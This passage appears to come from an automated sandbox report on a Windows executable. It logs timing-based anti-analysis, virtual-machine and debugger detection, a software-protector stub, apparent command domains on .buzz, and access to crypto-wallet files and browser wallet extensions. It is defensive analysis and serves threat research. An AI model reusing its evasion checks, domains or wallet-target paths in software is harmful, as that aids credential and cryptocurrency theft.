Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5E4D second address: 66C5E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5E6F second address: 66C5E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689E74 second address: 6689E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689E78 second address: 6689E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC22D01ECC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689E87 second address: 6689E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689E8D second address: 6689EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC22D01ECCEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC22D01ECCCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689EB3 second address: 6689EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689EB7 second address: 6689EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689EBB second address: 6689EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689EC1 second address: 6689EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6689EC9 second address: 6689EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC22CC1B8AEh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5FB3 second address: 66C5FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5FB9 second address: 66C5FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5FBF second address: 66C5FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5FC3 second address: 66C6013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC22CC1B8B5h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC22CC1B8B7h 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C6928 second address: 66C6940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C6940 second address: 66C6960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22CC1B8B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C6960 second address: 66C696B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66CA7DC second address: 66CA7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66CA7E1 second address: 66CA7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C97EC second address: 66C9808 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC22CC1B8A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC22CC1B8ADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66CA992 second address: 66CA9A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jnp 00007FC22D01ECDBh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D508E second address: 66D5094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D5094 second address: 66D50F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD6h 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007FC22D01ECCCh 0x00000012 jnl 00007FC22D01ECD2h 0x00000018 jmp 00007FC22D01ECD2h 0x0000001d push ebx 0x0000001e jmp 00007FC22D01ECD2h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 668D4D2 second address: 668D4EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B5h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D45BD second address: 66D45C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D45C1 second address: 66D45E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC22CC1B8AFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D45E1 second address: 66D45E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D45E6 second address: 66D462B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 jmp 00007FC22CC1B8B9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 jnl 00007FC22CC1B8A8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007FC22CC1B8A6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D4D2D second address: 66D4D46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D4D46 second address: 66D4D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D4D54 second address: 66D4D82 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECC6h 0x00000008 js 00007FC22D01ECC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FC22D01ECCEh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC22D01ECCEh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D4EDC second address: 66D4F06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22CC1B8B3h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D877C second address: 66D879E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC22D01ECCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FC22D01ECCCh 0x00000016 jo 00007FC22D01ECC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66D879E second address: 66D8801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22CC1B8ACh 0x00000008 jp 00007FC22CC1B8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 mov dword ptr [ebp+122D3BB6h], ebx 0x00000017 call 00007FC22CC1B8A9h 0x0000001c pushad 0x0000001d jmp 00007FC22CC1B8B2h 0x00000022 ja 00007FC22CC1B8A8h 0x00000028 popad 0x00000029 push eax 0x0000002a push ecx 0x0000002b je 00007FC22CC1B8A8h 0x00000031 pushad 0x00000032 popad 0x00000033 pop ecx 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 jmp 00007FC22CC1B8ACh 0x0000003d mov eax, dword ptr [eax] 0x0000003f jnp 00007FC22CC1B8B4h 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: 9A8E92 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: B60C8E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: BE87B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: 66C8E1D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: 651B152 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: 651DF42 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: 66D5BAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: 6765397 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Special instruction interceptor: First address: 652297C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_3_014F1775 sldt word ptr [eax+0000007Ah] 0_3_014F1775
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2352 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2052 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2828 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 3700 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1876753898.00000000063DC000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B85000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001447000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZ
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 0zBsv1tnt4.exe, 00000000.00000002.1876753898.00000000063DC000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: NTICE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: SICE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: SIWVID
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098E110 LdrInitializeThunk, 0_2_0098E110

HIPS / PFW / Operating System Protection Evasion

Source: 0zBsv1tnt4.exe String found in binary or memory: hummskitnj.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: appliacnesot.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: cashfuzysao.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: inherineau.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: screwamusresz.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: rebuildeso.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: scentniej.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: mindhandru.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: prisonyfork.buzz
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OProgram Manager
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: {Program Manager
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 0zBsv1tnt4.exe, 00000000.00000003.1626030544.000000000150B000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001462000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: 0zBsv1tnt4.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"
Source: 0zBsv1tnt4.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0T
Source: 0zBsv1tnt4.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
Source: 0zBsv1tnt4.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 0zBsv1tnt4.exe String found in binary or memory: keystore
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
